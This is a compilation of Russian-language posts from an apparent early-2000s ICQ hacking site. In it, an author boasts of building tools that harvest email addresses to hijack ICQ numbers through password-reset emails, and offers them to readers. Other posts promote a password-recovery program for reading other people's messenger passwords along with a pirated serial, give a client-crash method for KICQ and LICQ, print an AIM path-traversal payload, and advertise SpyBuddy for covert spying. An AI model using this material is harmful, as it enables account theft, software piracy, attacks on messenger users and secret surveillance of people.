В последнее время стал популярен угон ICQ UIN'а при помощи высылки пароля на мыло. Но сидеть и перебирать все вручную долго и неинтересно, а самое главное, как показывает практика, неэффективно. В инете есть целая куча прог, которые могут помочь в этом, но обо все попорядку...
Идея составлять списки типа [6тизначная ася] - [мыло] у меня появилась давно (многие скажут, что они тоже очень давно так делают, не буду с ними спорить), точнее так стал делать один мой друг, а я позаимствовал у него эту идею. Только сидеть выписывать мылы вручную быстро надоедает, а проверять... так это вообще сильно начинает бесить, особенно когда после проверки своего листа из 100 мыл ты ничего не угоняешь.
Зимой 2001-2002 года мысль о том, что пора бы попробовать написать прогу, которая бы брала инфу о юзере, перестала покидать мою голову. После долгих и бессонных ночей, проведенных в безуспешном поиске метода реализаци программы, пришла простая мысль о том, что можно скачивать хтмл страницу с ифой о юзере. 6 января 2002 года появляется Assault 1.0.0.0. По сегодняшним понятиям это уже что-то вроде запорожца в сравнении с Porsche, но тогда это была неплохая прога... Работала она взаимодействуя через OLE с Internet Explorer с максимальной скоростью 7 уин/мин и за ночь могла спокойно проверить 2500-3500 уинов... Прога прекрасно работала и меня ничего волновало долгое время. Всем известная ISEEKEMAIL от MASS TOOL работает почти по такому же принципу... Только вся фишка заключается в том, что веб сервер ICQ очень пакостный и время от времени посылает юзеров на страничку с надписью "Error Has Occurred". А иногда инфу про юзера взять просто невозможно... Так вот парсинг хтмл в ISEEKEMAIL организован так: в хтмл коде находится вхожедние "Primary E-Mail:" и первое после него, что содержит "@" и есть мыло. Естественно никто даже и не подумал что бывает такая ошибка, а она как показывает практика составляет 30-50% от количества запрошенных страниц, плюс еще есть баг, когда у юзера не введен примари емайл, а введен секондари, ISEEKEMAIL выдаст секондари за примари. Надо сказать гуманная программа: если кто-то что-то пропустил, есть шанс, что это найдут другие. Моя же прога работала по-другому, но у нее был глюк другого рода... Обнаружил его я только в версии Assault 1.2.1.49. Дело в том, что прога сжирает постепенно немерянное количество памяти и к утру достигает 50Мб совершенного хлама в памяти. Тем не менее, с помощью ее я умудрился угнать около 100 6тизначных уинов...

В это время я уже начинал работать над Assault 2, которая принципиально ничем не отличалась от первой версии. Смысл оставлся тем же, но отличия в принципе реализации метода давали сильные преимущества:
- теперь программа работала через HTTP протокол напрямую с сокетом - резко уменьшился размер области памяти занимаемый прогой (оклол 4 Мб);
- поддержка потоков;
- грузилась не вся страница - это существенно уменьшало траффик;
- "Error Has Ocurred" или "Not A Valid ICQ Number" отлавливалось в считанные секунды, что позволяло увеличить скорость программы;
- к тому же программа была устойчива к потере соединения, отлавливала таймауты и т.п.
- плюс ко всему появилась возможность поиска не только по зоне, но и по списку (кстати, она так и не была полностью реализовна в версии 2.0.0.2).
Программа у меня на модеме 33 600 работала со скоростью 12 уин/мин при 2 потоках. Несмотря на то, что ошибки стали распозноваться быстрее, их почему-то стало намного больше... теперь из 12000 запросов ответ приходил всего 3500 раз. Прога эта была написана мной в прошлую пятницу 29 марта, и просуществовала она ровно неделю...

www.assault2icq.nm.ru/
Надо сказать, эта неделя для меня стала особо бурной и непредвиденной... Чего только стоит изобретение коммандой ICQ.com фильтра отсылки мыла с паролем. А в среду Dynamovets еще и успел меня сильно напонтовать прогой @spider от ad4, которая по его словам очень быстро пашет... скажу честно, я всегда думал что ad4 фуфла не делает. Хотя може просто прога у меня так плохо работает. Неверное разделение задач между потоками приводит к тому что программа находит по пять раз один и тот же уин, при этом не находя 4 других. Плюс надоедливое мыло типа pager_uin@icq.com, которое выдается в случае, если у чела нет в инфе примари е-майла. Короче, я разочаровался в ad4. И Dynamovets тоже, после сверки результатов: "у тебя видит намного больше мыл, чем спайдер..." и позднее добавил: "не, я здрался. Он глючный, иногда выдает критические ошибки давай мне свою прогу, я буду поддерживать відчизняного виробника ))"
Со времени написания своей первой проги меня мучал один и тот же вопрос: почему столько шарящих людей в протоколе аси еще не написали подобную прогу. Ведь именно на протоколе аси было бы рациональнее и быстрее всего. Возможно, конечно, кто-то и написал просто не стал выкладывать ее в инет, а тихо юзает сам, как и я свои проги Я долго думал над тем как написать такую прогу, и, наконец, вчера моя мечта воплотилась в логическую последовательность байт. Результат превзошел все мои ожидания. За ночь я проверил большее число уинов чем за 3 месяца... Конечно на модемном соединении со скоростью 33 600 многого не получиш, но 250 уин/мин при 9 потоках стало для меня огромным достижением.

www.assault2icq.nm.ru/
Пожалуй, на последок могу только добавить, что проверять существует мыло или нет мне помогла другая прога, тоже написанная мной. Она сейчас находится на стадии доработки, но по словам Nook'а (бета-тестера моей команды) "программа работала просто на ура , я такой скорости работы давно не встречал , а на хорошем коннекте просто летала ........"
Так что, привет там всяким Mass-Tools'ам, RONOP'aм и ad4 Если кого забыл, простят. Русские как всегда рулят
З.Ы. Вот пожалуй и все. что я хотел сообщить.
Огромное TNX людям, которые со мной работают:
WereWolf
[pk]ko
Rover
Nook
Dynamovets
Special TNX to Feathery за любезно предоставленное эфирное время
З.Ы.Ы. Если Вас заинтересовало, откуда можно скачать эти проги, стучитесь в мою аську 891515 или ждите, я выложу ссылки на форуме в ближайшие 7 дней...

привет физ.....вот там на форуме многие жаждут I Seek E-Mail версии 3.0 .
Ну вот решил выложить

ClibBird позволяет заносить в Буфер Обмена Windows строчки, содержащие символы с кодами до 32, а также просматривать Буфер Обмена (в Plaintext). Так как строчка формируется побайтно, то никаких ограничений на сочетание и расположение символов нет.
Например, с помощью этой проги легко решается такая задача, как вставка в какое-либо поле ввода текста произвольной последовательности символов #13 и #10.
Частное применение - ввод нетривиальных паролей, содержащих не только "стандартные" буквенно-цифровые символы, но и служебные а также любые символы из второй половины таблицы ASCII-символов.
Кроме этого, с помощью проги можно легко отличать внешне одинаковые символы, например, русскую "о" [код 238] и английскую "o" [код 111]. (А значит, в частности, и внешне одинаковые ники в чатах, форумах и т.д. )
---------------------------------------------------
ЭТО НЕ UNICODE!!! ЭТО ОБЫЧНЫЙ PLAINTEXT
---------------------------------------------------
Формат ввода строчки:
ddd*ddd*ddd*ddd и т.д., где ddd-код символа, а * - любой нецифровой символ-разделитель, например точка.
Если для одного символа цифр кода введено больше трёх, берутся первые три, если число, которое они составляют больше 255, берём по модулю 256...
Прога распространяется НАХАЛЯВУ! Качать отсюда.

Приветствую всех любителей аськи. Сегодня я хотел бы поведать вам о проге, которую незаслуженно обошли вниманием. Софтинка сия называется Advanced Instant Messengers Password Recovery или кратко AIMPR. Официальный сайт находится по адресу http://elcomsoft.com/aimpr.html. Выпускает ее печально известная компания ElcomSoft. Программа представляет собой средство для восстановления своих паролей или соответсвенно для исследования чужих. Среди особенностей, которые отличают ее от аналогов можно отметить то, что она подбирает пароли не только ко всем версиям аськи, но и к абсолютному большинству аськиных конкурентов. Версия 1.30, которая является последней на момент написания статьи может показать пароли для следующих мессенджеров: ICQ, AOL IM, Yahoo! Messenger, MSN Messenger, Excite Messenger, Odigo, Trillian, AT&T IM Anywhere, T-Online Messenger, Match Messenger, Praize IM, ScreenFIRE, ACD Express Comunicator, Imici Messenger, Prodigy IM, PowWow Messenger, Jabber IM, Kellster IM, PalTalk, Indiatimes messenger, Miranda, Tiscali. Как видите здесь есть не только все известные болталки, но и те, о которых вы никогда не слышали. Также к достоинствам можно отнести стабильность, скорость и маленький размер данной софтины - около 200 кб. Безусловно программка относится к разряду MustHave. Но имеет один существенный недостаток. За нее хотят деньги. Самой новой версией, для которой удалось найти серийник, является 1.21. (Если у кого-нибудь есть серийный номер к более поздним версиям, присылайте и ваш труд не останется незамеченным). Отличий от версии 1.30 не очень много. Вы можете ознакомиться с ними здесь. В этом архиве находится AIMPR 1.21 вместе с reg файлом и описанием. Надо сказать это хозяйство прекрасно устанавливается на дискету. И быстро выполняет свои функции. Выводы делайте сами
[от Feathery] ) Да-да! Точно ) ОООО-О-о-очень крутая прога от Элкомсофта ))
[re: from Stranix] А ты аську выключи и по новой попробуй. Прога не вскрывает дат файл, используемый в данный момент, во избежание конфликта. Что касается Pass Finder'a на скриншоте... дык сам себя не похвалишь - никто не похвалит)).

KICQ - это клиент, который был специально разработан для KDE. Уязвимость найдена в KICQ 2.0.0b1 использующей icqlib 1.0.0, а вот собственно говоря и само описание ошибки:
Для того, чтобы удалённо "повалить" KICQ, достаточно просто подсоединиться используя протокол telnet на порт, на котором работает KICQ и послать на него немного мусора:
bash-2.05$ telnet 10.0.0.1 1030
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
.... мусор ....
Connection closed by foreign host.
Клиент вылетит примерно со следующим сообщением:
KCrash: crashing.... crashRecursionCounter = 2
KCrash: Application Name = kicq path = [unknown]
На настоящее время необходимых патчей не находил. Возможно, стоит обратиться на сайт разработчика: http://sourceforge.net/projects/kicq

Ну вот расскажу Вас ещё об одной ошибке, связанной с клиентами ICQ. На этот раз она была найдена не в так широко используемом LICQ. Хотя общий смысл её мало понятен, всё равно считаю, что для общего развития знать о данном баге необходимо.
Установите с кем-нибудь чат ("icq chat" среди владельцев LICQ. Теперь нужно осуществить процесс отправки постоянного потока %d (достаточно около 1000 символов). У владельца LICQ программа вылетит с ошибкой.
Тестирование осуществлялось на: licq 1.0.4.
Licq Segmentation Violation Detected.
Backtrace:
licq(licq_handle_sigsegv+0x73) [0x809171b]
/lib/libpthread.so.0(pthread_kill+0x170) [0x4002deb4]
/lib/libc.so.6(__libc_sigaction+0x1f8) [0x400ce928]
licq(PopChatEvent__12CChatManager+0xab) [0x808ab2b]
/usr/local/lib/licq/licq_qt-gui.so(slot_chat__7ChatDlg+0xea6) [0x401fb68a]
/usr/lib/libqt.so.2(activate_signal__7QObjectPCci+0x12a) [0x40448b7e]
/usr/lib/libqt.so.2(activated__15QSocketNotifieri+0x28) [0x4049a0b8]
/usr/lib/libqt.so.2(event__15QSocketNotifierP6QEvent+0x44) [0x4047b07c]
/usr/lib/libqt.so.2(notify__12QApplicationP7QObjectP6QEvent+0x1ea) [0x403f88a6]
/usr/lib/libqt.so.2(qt_set_socket_handler__FiiP7QObjectb+0x4f2) [0x403c685a]
/usr/lib/libqt.so.2(processNextEvent__12QApplicationb+0x6c7) [0x403c6f9b]
/usr/lib/libqt.so.2(enter_loop__12QApplication+0x3c) [0x403fa5f4]
/usr/lib/libqt.so.2(exec__12QApplication+0x2b) [0x403c68c7]
/usr/local/lib/licq/licq_qt-gui.so(Run__8CLicqGuiP10CICQDaemon+0xf9) [0x402070ed]
/usr/local/lib/licq/licq_qt-gui.so(LP_Main+0x4d) [0x40205475]
/usr/local/lib/licq/licq_qt-gui.so(LP_Main_tep+0x21) [0x40205191]
/lib/libpthread.so.0(pthread_detach+0x519) [0x4002b065]
/lib/libc.so.6(__clone+0x3a) [0x4016d01a]
Attempting to generate core file.
syn@slackware:~#
Вот собственно и вся имеющаяся у меня информация на этот счёт.

Уязвимость в AOL Instant Messenger позволяет AIM пользователю сохранять файлы в произвольном местоположении. Файл (содержит тег IMG и тэг data), передающийся при прямом соединении между AIM пользователями, будет при получении записан в temp каталог и выполнен оттуда. Включение последовательности символов '.. \ ' в параметр SRC тэга img позволяет пользователю сохранять файл в любом другом каталоге. Пример:
[textarea name="textfield" cols="60" rows="6]<HTML><BODY>Hey, what's up?<IMG
SRC="\..\system\johnny.important_file" HEIGHT="0"
WIDTH="0" DATASIZE="50"
ID="1"></BODY></HTML><BINARY><DATA
ID=1">***WAVE FILE DATA
HERE***</DATA></BINARY> [/textarea]
Уязвимость найдена в AOL Instant Messenger 4.0-4.7

SpyBuddy - неплохое решение для слежки за пользователями компьютера: детьми, сотрудниками, да кем угодно. Программа фиксирует всё, что делает пользователь и записывает собранную информацию в лог-файл.
Одна из уникальных возможностей SpyBuddy - способность перехвата и сохранения переписки пользователя, использующего AOL/ICQ/MSN/AIM. "Шпион" может также сохранять информацию о посещенных веб-сайтах, открытых окнах, запущенных приложениях, распечатанных документах, информации, скопированной в буфер обмена. Интересная возможность - создание снимков с экрана пользователя через определенные интервалы времени.
Если вы хотите следить за пользователем, но не имеете ежедневного доступа к его компьютеру, SpyBuddy сможет отправлять все лог-файлы по электронной почте.
Программа имеет статус Shareware. Стоимость регистрации составляет 50 долл. Скачать ее можно [ahref="http://tucows.rinet.ru/files3/spybuddy-setup-sw.exe]отсюда.[/link]

Компания "Компьютерные и информационные технологии" (КИТ) совместно с системой WebMoney Transfer объявили о запуске новой, универсальной системы мгновенных расчетов Paymer.
В качестве расчетного средства в системе используются цифровые чеки, передаваемые между пользователями любым удобным для них способом: с помощью электронной почты, ICQ, факса или обычного телефона.
Сообщая партнеру реквизиты чека Paymer, пользователь системы совершает расчетную операцию, сопровождающуюся передачей чека его новому владельцу. При этом ни с получателя, ни с отправителя не взимается комиссии. Таким образом, чеки Paymer многократно передаются от одного владельца другому в любой доступной для контактов среде, не теряя своей цифровой ценности.
Чеки Paymer могут использоваться для расчетов за онлайн-товары и услуги, предоставляемые различными интернет-магазинами, торговыми площадками, информационными ресурсами и другими сетевыми сервисами, а также для оплаты любых товаров и услуг, предоставляемых вне Сети. Чеки являются наиболее простым решением во всех случаях, когда заинтересованные стороны не имеют непосредственного контакта, но должны быть уверены в мгновенности передачи расчетных средств.
На данный момент цифровая ценность чеков обеспечивается средствами, зарезервированными на кошельках WebMoney Transfer. Вместе с тем система Paymer открыта для взаимодействия с платежными сервисами, кредитными организациями, а также любыми компаниями, желающими обеспечить выпуск собственных расчетных инструментов и готовыми предоставить для этих целей гарантированное обеспечение имеющимися в их распоряжении активами.

Стала доступной для скачивания ася 2002a Beta Build #3727. Качаем тут, а ссылки на патчи шлём вот на этот мыльник]]] pin@ru.ru (просьба слать только ссылки где можно скачать патч ящик небездонный).